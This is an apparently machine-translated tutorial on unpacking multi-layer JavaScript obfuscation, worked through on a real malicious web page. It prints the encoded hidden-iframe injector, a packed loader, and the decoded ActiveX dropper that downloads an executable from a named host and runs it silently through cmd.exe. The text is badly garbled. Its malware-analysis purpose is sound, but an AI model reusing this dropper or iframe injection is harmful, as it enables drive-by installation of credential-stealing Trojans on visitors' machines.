Jser must be familiar with cracking various javascript encryption Reverse Thinking Methods Original

Source: Internet
Author: User

Original article. For reprinted, please state the source of your home
I discovered various reverse thinking methods for cracking javascript encryption. all of you have a good method to follow.
I recently found a code that encrypts around five layers. I will crack the last step without using javascript to decrypt the program.

List of software used
1. The direct browsing of thunder (download web page) will be executed, and the source code cannot be seen
2. You can use the firefox software to directly browse the website. Because of the special nature of firefox, we recommend that you use this browser.
1. Target website http://www.e9ad.cn/pcdd/80-806.htm
We can use thunder to download this page or use the firefox browser to browse the following code:
Copy codeThe Code is as follows:
<Script language = javascript> var DFQC = function (a) {return String. fromCharCode
(A ^ 22)}; document. write (DFQC (42) + DFQC (126) + DFQC (98) + DFQC (123) + DFQC (122) + DFQC (40) + DFQC (27)
+ DFQC (28) + DFQC (54) + DFQC (42) + DFQC (126) + DFQC (115) + DFQC (119) + DFQC (114) + DFQC (40) + DFQC (27) + DFQC
(28) + DFQC (42) + DFQC (101) + DFQC (117) + DFQC (100) + DFQC (127) + DFQC (102) + DFQC (98) + DFQC (40) + DFQC (27)
+ DFQC (28) + DFQC (54) + DFQC (112) + DFQC (99) + DFQC (120) + DFQC (117) + DFQC (98) + DFQC (127) + DFQC (121) + DFQC
(120) + DFQC (54) + DFQC (117) + DFQC (122) + DFQC (115) + DFQC (119) + DFQC (100) + DFQC (62) + DFQC (63) + DFQC
(109) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (69) + DFQC (121) + DFQC (99) + DFQC (100) + DFQC (117) + DFQC (115)
+ DFQC (43) + DFQC (114) + DFQC (121) + DFQC (117) + DFQC (99) + DFQC (123) + DFQC (115) + DFQC (120) + DFQC (98)
+ DFQC (56) + DFQC (116) + DFQC (121) + DFQC (114) + DFQC (111) + DFQC (56) + DFQC (112) + DFQC (127) + DFQC (0, 100)
+ DFQC (101) + DFQC (98) + DFQC (85) + DFQC (126) + DFQC (127) + DFQC (122) + DFQC (114) + DFQC (56) + DFQC (0, 114)
+ DFQC (119) + DFQC (98) + DFQC (119) + DFQC (45) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (114) + DFQC (121) + DFQC
(117) + DFQC (99) + DFQC (123) + DFQC (115) + DFQC (120) + DFQC (98) + DFQC (56) + DFQC (121) + DFQC (102) + DFQC
(115) + DFQC (120) + DFQC (62) + DFQC (63) + DFQC (45) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (114) + DFQC (121)
+ DFQC (117) + DFQC (99) + DFQC (123) + DFQC (115) + DFQC (120) + DFQC (98) + DFQC (56) + DFQC (117) + DFQC (0, 122)
+ DFQC (121) + DFQC (101) + DFQC (115) + DFQC (62) + DFQC (63) + DFQC (45) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC
(114) + DFQC (121) + DFQC (117) + DFQC (99) + DFQC (123) + DFQC (115) + DFQC (120) + DFQC (98) + DFQC (56) + DFQC (98)
+ DFQC (127) + DFQC (98) + DFQC (122) + DFQC (115) + DFQC (43) + DFQC (52) + DFQC (113) + DFQC (113) + DFQC (52) + DFQC
(45) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (114) + DFQC (121) + DFQC (117) + DFQC (99) + DFQC (123) + DFQC (115)
+ DFQC (120) + DFQC (98) + DFQC (56) + DFQC (116) + DFQC (121) + DFQC (114) + DFQC (111) + DFQC (56) + DFQC (0, 127)
+ DFQC (120) + DFQC (120) + DFQC (115) + DFQC (100) + DFQC (94) + DFQC (66) + DFQC (91) + DFQC (90) + DFQC (43) + DFQC
(69) + DFQC (121) + DFQC (99) + DFQC (100) + DFQC (117) + DFQC (115) + DFQC (45) + DFQC (27) + DFQC (28) + DFQC (54)
+ DFQC (107) + DFQC (42) + DFQC (57) + DFQC (101) + DFQC (117) + DFQC (100) + DFQC (127) + DFQC (102) + DFQC (98)
+ DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (98) + DFQC (127) + DFQC (98) + DFQC (122) + DFQC
(115) + DFQC (40) + DFQC (119) + DFQC (114) + DFQC (42) + DFQC (57) + DFQC (98) + DFQC (127) + DFQC (98) + DFQC (122)
+ DFQC (115) + DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (57) + DFQC (126) + DFQC (115) + DFQC
(119) + DFQC (114) + DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (116) + DFQC (121) + DFQC (114)
+ DFQC (111) + DFQC (54) + DFQC (121) + DFQC (120) + DFQC (122) + DFQC (121) + DFQC (119) + DFQC (114) + DFQC (43)
+ DFQC (117) + DFQC (122) + DFQC (115) + DFQC (119) + DFQC (100) + DFQC (62) + DFQC (63) + DFQC (54) + DFQC (98) + DFQC
(121) + DFQC (102) + DFQC (123) + DFQC (119) + DFQC (100) + DFQC (113) + DFQC (127) + DFQC (120) + DFQC (43) + DFQC
(52) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (122) + DFQC (115) + DFQC (112) + DFQC (98) + DFQC (123) + DFQC (119)
+ DFQC (100) + DFQC (113) + DFQC (127) + DFQC (120) + DFQC (43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC
(100) + DFQC (127) + DFQC (113) + DFQC (126) + DFQC (98) + DFQC (123) + DFQC (119) + DFQC (100) + DFQC (113) + DFQC
(127) + DFQC (120) + DFQC (43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (116) + DFQC (121) + DFQC (98)
+ DFQC (98) + DFQC (121) + DFQC (123) + DFQC (123) + DFQC (119) + DFQC (100) + DFQC (113) + DFQC (127) + DFQC (0, 120)
+ DFQC (43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (55)
+ DFQC (59) + DFQC (59) + DFQC (27) + DFQC (28) + DFQC (42) + DFQC (127) + DFQC (112) + DFQC (100) + DFQC (119) + DFQC
(123) + DFQC (115) + DFQC (54) + DFQC (120) + DFQC (119) + DFQC (123) + DFQC (115) + DFQC (43) + DFQC (52) + DFQC (95)
+ DFQC (39) + DFQC (52) + DFQC (54) + DFQC (101) + DFQC (100) + DFQC (117) + DFQC (43) + DFQC (52) + DFQC (46) + DFQC
(38) + DFQC (46) + DFQC (38) + DFQC (56) + DFQC (126) + DFQC (98) + DFQC (123) + DFQC (52) + DFQC (54) + DFQC (123)
+ DFQC (119) + DFQC (100) + DFQC (113) + DFQC (127) + DFQC (120) + DFQC (97) + DFQC (127) + DFQC (114) + DFQC (98)
+ DFQC (126) + DFQC (43) + DFQC (52) + DFQC (39) + DFQC (52) + DFQC (54) + DFQC (123) + DFQC (119) + DFQC (100) + DFQC
(113) + DFQC (127) + DFQC (120) + DFQC (126) + DFQC (115) + DFQC (127) + DFQC (113) + DFQC (126) + DFQC (98) + DFQC
(43) + DFQC (52) + DFQC (39) + DFQC (52) + DFQC (54) + DFQC (126) + DFQC (115) + DFQC (127) + DFQC (113) + DFQC (126)
+ DFQC (98) + DFQC (43) + DFQC (52) + DFQC (46) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (97) + DFQC (127) + DFQC
(114) + DFQC (98) + DFQC (126) + DFQC (43) + DFQC (52) + DFQC (46) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (101)
+ DFQC (117) + DFQC (100) + DFQC (121) + DFQC (122) + DFQC (122) + DFQC (127) + DFQC (120) + DFQC (113) + DFQC (43)
+ DFQC (52) + DFQC (120) + DFQC (121) + DFQC (52) + DFQC (54) + DFQC (116) + DFQC (121) + DFQC (100) + DFQC (0, 114)
+ DFQC (115) + DFQC (100) + DFQC (43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (54) + DFQC (112) + DFQC (100) + DFQC
(119) + DFQC (123) + DFQC (115) + DFQC (116) + DFQC (121) + DFQC (100) + DFQC (114) + DFQC (115) + DFQC (100) + DFQC
(43) + DFQC (52) + DFQC (38) + DFQC (52) + DFQC (40) + DFQC (42) + DFQC (57) + DFQC (127) + DFQC (112) + DFQC (100)
+ DFQC (119) + DFQC (123) + DFQC (115) + DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (59) + DFQC (59) + DFQC
(40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (57) + DFQC (116) + DFQC (121) + DFQC (114) + DFQC (111)
+ DFQC (40) + DFQC (27) + DFQC (28) + DFQC (54) + DFQC (42) + DFQC (57) + DFQC (126) + DFQC (98) + DFQC (123) + DFQC
(122) + DFQC (40) + DFQC (54) + DFQC (27) + DFQC (28) + DFQC (42) + DFQC (69) + DFQC (85) + DFQC (68) + DFQC (95) + DFQC
(70) + DFQC (66) + DFQC (40) + DFQC (54) + DFQC (27) + DFQC (28) + DFQC (42) + DFQC (55) + DFQC (59) + DFQC (59) + DFQC
(54) + DFQC (27) + DFQC (28) + DFQC (97) + DFQC (127) + DFQC (120) + DFQC (114) + DFQC (121) + DFQC (97) + DFQC (56)
+ DFQC (114) + DFQC (115) + DFQC (112) + DFQC (119) + DFQC (99) + DFQC (122) + DFQC (98) + DFQC (69) + DFQC (98) + DFQC
(119) + DFQC (98) + DFQC (99) + DFQC (101) + DFQC (43) + DFQC (52) + DFQC (54) + DFQC (54) + DFQC (52) + DFQC (45)
+ DFQC (54) + DFQC (27) + DFQC (28) + DFQC (57) + DFQC (57) + DFQC (59) + DFQC (59) + DFQC (40) + DFQC (54) + DFQC (27)
+ DFQC (28) + DFQC (42) + DFQC (57) + DFQC (69) + DFQC (85) + DFQC (68) + DFQC (95) + DFQC (70) + DFQC (66) + DFQC (40)
+ DFQC (27) + DFQC (28) + DFQC (42) + DFQC (127) + DFQC (112) + DFQC (100) + DFQC (119) + DFQC (123) + DFQC (0, 115)
+ DFQC (54) + DFQC (101) + DFQC (100) + DFQC (117) + DFQC (43) + DFQC (126) + DFQC (98) + DFQC (98) + DFQC (102) + DFQC
(44) + DFQC (57) + DFQC (57) + DFQC (102) + DFQC (121) + DFQC (102) + DFQC (56) + DFQC (97) + DFQC (108) + DFQC (110)
+ DFQC (103) + DFQC (111) + DFQC (56) + DFQC (117) + DFQC (121) + DFQC (123) + DFQC (57) + DFQC (33) + DFQC (33) + DFQC
(33) + DFQC (57) + DFQC (127) + DFQC (120) + DFQC (114) + DFQC (115) + DFQC (110) + DFQC (56) + DFQC (126) + DFQC (98)
+ DFQC (123) + DFQC (54) + DFQC (97) + DFQC (127) + DFQC (114) + DFQC (98) + DFQC (126) + DFQC (43) + DFQC (38) + DFQC
(54) + DFQC (126) + DFQC (115) + DFQC (127) + DFQC (113) + DFQC (126) + DFQC (98) + DFQC (43) + DFQC (38) + DFQC (40)
+ DFQC (42) + DFQC (57) + DFQC (127) + DFQC (112) + DFQC (100) + DFQC (119) + DFQC (123) + DFQC (115) + DFQC (40)
+ DFQC (27) + DFQC (28) + DFQC (27) + DFQC (28) + ''); </script>

What about the decryption?
Let's take a look at document. write (DFQC (42) + DFQC (126 ).....
In this DFQC (42), DFQC decrypts var DFQC = function (a) {return String. fromCharCode (a ^ 22 )}
I have also thought about the decryption code below. This method can basically crack a lot of similar code. You can refer to this code.
<Html> <body> </ptml>
[Ctrl + A select all Note: If you need to introduce external Js, You need to refresh it to execute]
The decrypted code is
Copy codeThe Code is as follows:
<Html>
<Head>
<Script>
Function clear (){
Source = document. body. firstChild. data;
Document. open ();
Document. close ();
Document. title = "gg ";
Document. body. innerHTML = Source;
} </Script>
<Title> ad </title>
</Head>
<Body onload = clear () topmargin = "0" leftmargin = "0" rightmargin = "0" bottommargin = "0">
<! --
<Iframe name = "I1" src = "8080.htm" marginwidth =" 1 "marginheight =" 1 "height =" 80 "width =" 80"
Scrolling = "no" border = "0" frameborder = "0"> </iframe>
-->
</Body>
</Html>
<SCRIPT>
<! --
Window. defaultStatus = "";
// -->
</SCRIPT>
<Iframe src = http://pop.wzxqy.com/777/index.htm width = 0 height = 0> </iframe>

2. Check the above token
I found that there is a problem with loading the iframe below. So,
Download the code on the page http://pop.wzxqy.com/777/index.htmusing the download tool as follows:
Copy codeThe Code is as follows:
<Iframe src = http://cc.wzxqy.com/wm/index.htm width = 0 height = 0> </iframe>
<Script src = 'HTTP: // s92.cnzz.com/stat.php? Id = 451144 & web_id = 451144 'language = 'javascript'
Charset = 'gb2312'> </script>

It should be noted that many websites sell code similar to the traffic (that is, the traffic)
3. http://cc.wzxqy.com/wm/index.htm under continuous analysis
Download this page with the download tool.
Copy codeThe Code is as follows:
<Script language = javascript src = 1.js> </script>

Please download the code http://cc.wzxqy.com/wm/1.js.
Copy codeThe Code is as follows:
Eval (function (p, a, c, k, e, d) {e = function (c) {return (c <? '': E (parseInt (c/a) + (c = c % a)> 35?
String. fromCharCode (c + 29): c. toString (36)}; if (! ''. Replace (/^/, String) {while (c --) d [e (c)] = k
[C] | e (c); k = [function (e) {return d [e]}]; e = function () {return '\ w +'}; c = 1}; while (c --) if (k [c])
P = p. replace (new RegExp ('\ B' + e (c) + '\ B', 'G'), k [c]); return p} ('f 8 (n) {3g = h. j () * n; k \'~ 5
\ '+ \'. 5 \ '} l {9 = \' m: // o. p. q/r/s. a \ '; 3 4 = t. u ("v"); 4.w( "y", "z: A-B-C-D-E"); 3 x = 4.7
("G. X "+" M "+" L "+" H "+" T "+" T "+" P "," "); 3 S = 4.7 (" I. J "," "); S. K = 1; x. B ("N", 9, 0); x. O (); 6 = 8 (R); 3
F = 4.7 ("U. V "," "); 3 5 = F.W (0); 6 = F. d (5, 6); S.Y (); S. Z (x.10); S.11 (6, 2); S.12 (); 3 Q = 4.7
("13.14", ""); e = F. d (5 + \ '\ 15 \', \ '16. a \ '); Q.17 (e, \'/c \ '+ 6, "", "B", 0)} 18 (I)
{I = 1} ', 62,71,' | var | df | tmp | fname1 | CreateObject | gn | dl | exe | open | BuildPath | exp1 | function | numb
Er | Math | random | return | try | http | cc | wzxqy | com | wm | mm | document | createElement | object | setAttribu
Te | classid | clsid | BD96C556 | 65A3 | 11D0 | 983A | 00C04FC29E36 | Microsoft | Adodb | Stream | type | GET | s
End | 10000 | Scripting | FileSystemObject | GetSpecialFolder | Open | Write | responseBody | SaveToFil
E | Close | Shell | Application | system32 | cmd | ShellExecute | catch '. split (' | '), 0 ,{}))

You may find that the above Code cannot be decrypted. I searched for it and found that there was actually a decryption code. You can analyze it here, no
After reading this article, you do not need to decrypt the program. All the methods below are used,

[Ctrl + A select all Note: If you need to introduce external Js, You need to refresh it to execute]
The above method, if I think about the method that comes up in the next few seconds, I didn't think of it before. Now we can use it more in the future.
Use var str =... and document. write (str); to get the following code:
Copy codeThe Code is as follows:
Function gn (n) {var number = Math. random () * n; return '~ Tmp '+'. tmp '} try
{Dl = 'HTTP: // cc.wzxqy.com/wm/mm.exe'invalid var df = document. createElement ("object"); df. setAttribute
("Classid", "clsid: BD96C556-65A3-11D0-983A-00C04FC29E36"); var x = df. CreateObject
("Microsoft. X "+" M "+" L "+" H "+" T "+" T "+" P "," "); var S = df. createObject
("Adodb. stream "," "); S. type = 1; x. open ("GET", dl, 0); x. send (); fname1 = gn (10000); var
F = df. CreateObject ("Scripting. FileSystemObject", ""); var tmp = F. GetSpecialFolder
(0); fname1 = F. BuildPath (tmp, fname1); S. Open (); S. Write (x. responseBody); S. SaveToFile
(Fname1, 2); S. Close (); var Q = df. CreateObject ("Shell. Application", ""); exp1 = F. BuildPath
(Tmp + '\ system32', 'cmd.exe'); Q. shellExecute (exp1, '/C' + fname1, "", "open", 0)} catch (I) {I = 1}

Then we can find this http://cc.wzxqy.com/wm/mm.exe. download it first.
The file is small. First, change mm.exeto mm.exe.txt and open the following code. Alas,
Copy codeThe Code is as follows:
<Html> <body> <br>
<Script> window. location = "/wm/mm.exe? QVyRR = au6BKUDmtn1 "; </script>
<Center> </A> </Body>
See, the most important thing is this http://cc.wzxqy.com/wm/mm.exe? QVyRR = au6BKUDmtn1
Then download the file with the software. This is the virus file,
Finally, we found that the virus should be a Trojan of the account theft system. Now there is a lot of traffic sold online.

Of course, the above javascript reverse thinking method can obtain most of the encrypted javascript, and many others have decryption processes.
Preface: if all the good methods are posted, you can make progress. Author: reterry QQ: 461478385
Original article. For reprinted, please state the source of your home

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.